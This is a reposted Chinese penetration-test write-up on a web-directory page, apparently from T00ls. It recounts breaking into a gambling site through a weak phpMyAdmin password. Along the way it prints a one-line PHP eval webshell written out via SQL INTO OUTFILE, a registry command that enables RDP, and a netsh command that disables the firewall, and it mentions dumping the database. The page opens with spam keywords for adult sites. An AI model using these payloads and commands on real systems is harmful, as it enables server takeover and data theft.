日日操夜夜添-日日操影院-日日草夜夜操-日日干干-精品一区二区三区波多野结衣-精品一区二区三区高清免费不卡

公告:魔扣目錄網為廣大站長提供免費收錄網站服務,提交前請做好本站友鏈:【 網站目錄:http://www.ylptlb.cn 】, 免友鏈快審服務(50元/站),

點擊這里在線咨詢客服
新站提交
  • 網站:51998
  • 待審:31
  • 小程序:12
  • 文章:1030137
  • 會員:747

歡迎搜索公眾號:白帽子左一

每天分享更多黑客技能,工具及體系化視頻教程(免費領)

某種原因,接手了一個授權的bc站。


內心是拒絕的,但是沒辦法,硬著頭皮收下了。


其實都知道,bc站不是很好弄,在大佬眼里,可能就是掏出一個0day就進去了
但像我這種dd,只敢遠觀。


打開主頁,還算清新的畫風,比那些打開就這閃那閃花里胡哨的站舒服多了。

關于一次弱口令的BC滲透

 


簡單的掃了一下目錄,掃出了兩個比較有用的的東西就是一個后臺,一個探針

關于一次弱口令的BC滲透

 


見到后臺,廢話不多說,直接弱口令套餐來一份


得到的結果肯定是 密碼錯誤X1 密碼錯誤X2 密碼錯誤X3…………


算了,不浪費時間了,看一下探針~ 根據探針,得知網站的根目錄。

 

底下有phpmyadmin的連接測試

關于一次弱口令的BC滲透

 


直接弱口令再來一套,root root 密碼錯誤

Root 123456 密碼錯 唉 不對 好像是連接成功了

關于一次弱口令的BC滲透

 


激動的留下了眼淚
根據探針,得知phpmyadmin的后臺地址

關于一次弱口令的BC滲透

 


Root 123456
登錄

關于一次弱口令的BC滲透

 


Phpmyadmin進來了,網站根目錄也知道了,那還嘮啥了,直接拿shell了


直接執行sql語句

 

select'<?php @eval($_POST[pass]);?>' into outfile 'D:/xxx/xxx/xxx.php'


 

關于一次弱口令的BC滲透

 


一句話連接上,


Whoami system ………… 沒意思啊,提權都不用了

關于一次弱口令的BC滲透

 


通過查看服務器文件,得知后臺登陸密碼,登陸后臺

關于一次弱口令的BC滲透

 


因為個人喜好,比較喜歡用cs,powshell上線


讀了一下密碼,直接遠程連接

關于一次弱口令的BC滲透

 


但是

關于一次弱口令的BC滲透

 


netstat -an ,沒開3389

關于一次弱口令的BC滲透

 


開啟3389

 

REG ADD HKLMSYSTEMCurrentControlSetControlTerminal" "Server /v fDenyTSConnections /t REG_Dword /d 00000000 /f


但是連接了一下,還是不行,用nmap掃描了一下端口,只有80端口開放
應該是開著防火墻


netsh firewall set opmode mode=disable 關閉防火墻

關于一次弱口令的BC滲透

 


再連接3389 連接成功

關于一次弱口令的BC滲透

 


根據瀏覽器歷史記錄,又發現另一個網站后臺

關于一次弱口令的BC滲透

 


到現在其實沒啥了,直接數據庫打包~完活上交。

作者:T00ls-Azjj98

轉自:
https://www.t00ls.net/articles-56653.html

分享到:
標簽:滲透 BC
用戶無頭像

網友整理

注冊時間:

網站:5 個   小程序:0 個  文章:12 篇

  • 51998

    網站

  • 12

    小程序

  • 1030137

    文章

  • 747

    會員

趕快注冊賬號,推廣您的網站吧!
最新入駐小程序

數獨大挑戰2018-06-03

數獨一種數學游戲,玩家需要根據9

答題星2018-06-03

您可以通過答題星輕松地創建試卷

全階人生考試2018-06-03

各種考試題,題庫,初中,高中,大學四六

運動步數有氧達人2018-06-03

記錄運動步數,積累氧氣值。還可偷

每日養生app2018-06-03

每日養生,天天健康

體育訓練成績評定2018-06-03

通用課目體育訓練成績評定